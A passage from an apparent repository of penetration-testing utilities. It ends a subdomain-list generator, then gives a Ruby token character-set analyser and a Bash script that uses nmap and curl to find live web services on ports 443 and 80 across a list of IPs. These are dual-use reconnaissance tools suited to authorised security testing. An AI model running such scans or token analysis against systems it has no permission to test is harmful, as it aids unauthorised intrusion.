"#{subdomain.chomp}.#{domain.chomp}" 14 | end 15 | end 16 | 17 | else 18 | puts 'Usage: ./subdomains-creator.rb domains-list subdomains-list' 19 | end 20 | -------------------------------------------------------------------------------- /token_charset.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | ## By: Erwan Le Rousseau (RandomStorm) 5 | # 6 | ## 7 | # Performed an analysis of the tokens provided in the file 8 | # and output the possible charset for each character position 9 | ## 10 | # 11 | 12 | require 'terminal-table' 13 | require 'optparse' 14 | 15 | sort = false 16 | 17 | parser = OptionParser.new("Usage: #{$0} [options] tokens-file", 20) do |opts| 18 | opts.on('-s', '--sort', 'Sort the characters found') do 19 | sort = true 20 | end 21 | end 22 | parser.parse! 23 | 24 | if tokens_file = ARGV[0] 25 | 26 | tokens = File.readlines(tokens_file).map &:chomp 27 | token_length = tokens[0].size 28 | charset = Array.new(token_length, []) 29 | tokens_processed = 0 30 | 31 | charset.each_index { |index| charset[index] = [] } 32 | 33 | tokens.each do |token| 34 | token_a = token.chars.to_a 35 | 36 | (0..token_length-1).each do |index| 37 | token_char = token_a[index] || '' 38 | 39 | charset[index] << token_char unless charset[index].include?(token_char) 40 | end 41 | tokens_processed += 1 42 | end 43 | 44 | charset.each_index { |index| charset[index].sort! } if sort 45 | 46 | # Concerting columns to rows 47 | size = charset.max { |r1, r2| r1.size <=> r2.size }.size 48 | charset.each { |r| r[size - 1] ||= nil } 49 | rows = charset.transpose 50 | rows << :separator 51 | rows << [{ :value => "Tokens Processed: #{tokens_processed}", :colspan => token_length, :alignment => :center }] 52 | 53 | # Table 54 | headings = (1..token_length).to_a 55 | style = { padding_left: 0, padding_right: 0 } 56 | table = Terminal::Table.new(headings: headings, rows: rows, title: 'Character Position', style: style) 57 | 58 | puts table 59 | else 60 | puts parser 61 | end 62 | -------------------------------------------------------------------------------- /web-service-finder.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Gets the urls that return a status 200 on port 443 when given a list of ips. 4 | # 5 | # Usage: ./web-service-finder.sh ips.txt 6 | # 7 | # By: Leon Teale (RandomStorm) 8 | # 9 | 10 | 11 | ## Check for correct usage 12 | if [ -z "$1" ]; 13 | then 14 | echo "" 15 | echo "please provide some ips for the script" 16 | echo " Usage: ./web-service-finder.sh ips.txt" 17 | echo "" 18 | else 19 | echo "" 20 | for ip in `cat $1`; 21 | do echo "$ip"; 22 | 23 | #Perform nmap to only gather ips that have port 443 open else the script can hang. 24 | nmap $ip -p 443 -o /dev/null | egrep open; done | grep -B 1 open > temp.txt; cat temp.txt | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' > ips443.txt; 25 | for ip in `cat ips443.txt | sort -u`; do 26 | 27 | #Performs the last bit of the program using curl to grab the URL 28 | curl -k -sL -w "%{http_code} %{url_effective}\\n" "https://$ip"; done | grep "200 https" 29 | 30 | for ip in `cat $1`; 31 | do echo "$ip"; 32 | 33 | #Perform nmap to only gather ips that have port 80 open else the script can hang. 34 | nmap $ip -p 80 -o /dev/null | egrep open; done | grep -B 1 open > temp.txt; cat temp.txt | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' > ips80.txt; 35 | for ip in `cat ips80.txt | sort -u`; do 36 | 37 | #Performs the last bit of the program using curl to grab the URL 38 | curl -k -sL -w "%{http_code} %{url_effective}\\n" "http://$ip"; done | grep "200 http" 39 | fi 40 | 41 | 42 | #clean up 43 | rm ips80.txt 44 | rm ips443.txt 45 | --------------------------------------------------------------------------------